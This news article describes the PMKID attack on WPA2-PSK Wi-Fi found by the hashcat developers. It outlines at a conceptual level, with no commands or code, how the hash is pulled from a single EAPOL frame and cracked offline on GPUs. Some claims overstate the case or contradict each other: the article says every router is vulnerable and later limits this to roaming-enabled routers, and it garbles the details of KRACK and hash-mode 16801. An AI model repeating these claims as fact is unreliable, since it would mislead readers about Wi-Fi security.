In October 2017, Mathy Vanhoef discovered a WPA2 attack vector that allowed access to a WPA2 Wi-Fi network in certain cases. This forced Wi-Fi Alliance to launch WPA3 (15 years after WPA2) to make the protocol more secure. This is great given that a new WPA2 vulnerability has been discovered.
WPA2 is not as secure as we thought: good thing WPA3 is coming
The vulnerability was discovered by the creators of hashcat, a penetration testing tool used to crack passwords. Said tool uses graphics cards to get Wi-Fi passwords, processing up to 64,000 hashes per second with a GTX 1080.
The new attack allows hackers to crack the password of a Wi-Fi network protected with WPA-PSK (pre-shared key) encryption, making every router with the protocol vulnerable. Every router is currently compatible with that security protocol.
Developers discovered the attack by accident while they were looking for possible WPA3 attacks, which in turn will be harder to carry out thanks to the Simultaneous Authentication of Equals (SAE) protocol that makes WPA3 immune to passive, active and dictionary-based attacks.
Unlike previous attacks, the key aspect of the new attack is that the 4-way handshake does not need to be captured like it did with KRACK. Instead, the attack extracts the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. The RSN IE is an optional field that contains the PMKID generated by a router when a user tries to authenticate.
The attack can be performed directly on the router without needing a user
This entails a series of advantages for the attacker, as no user is required because the attacker directly communicates with the access point (the router, for example). KRACK required a user to access the password, as it needed to be near the user in order to capture the authentication packets.
Besides, capturing the handshake was much easier after getting the Pairwise Master Key Identifier (PMKID). Additionally, a new method for collision resolution, called hash-mode 16801, allows to skip the computation of the PMK, which is what made cracking WPA so slow. Now, getting the hash is much easier, but cracking it is as difficult (or as easy) as always.
In order to crack the password, we just need hashcat 4.2.0, the tool’s latest version, and get the PMKID. It is recommended to have a dedicated graphics card or even several like most pentesters do (up to 4 for most). However, some systems have up to 3,500 graphics cards, which allows to crack passwords in just a few minutes.
People behind the discovery ignore how many devices and routers the vulnerability will affect. What they do know is that the vulnerability will work on routers with roaming functions enabled (802.11i/p/q/r). To protect ourselves against this attack, we just have to create difficult, long and complex passwords that are hard to crack, as getting a hash is really easy as of now.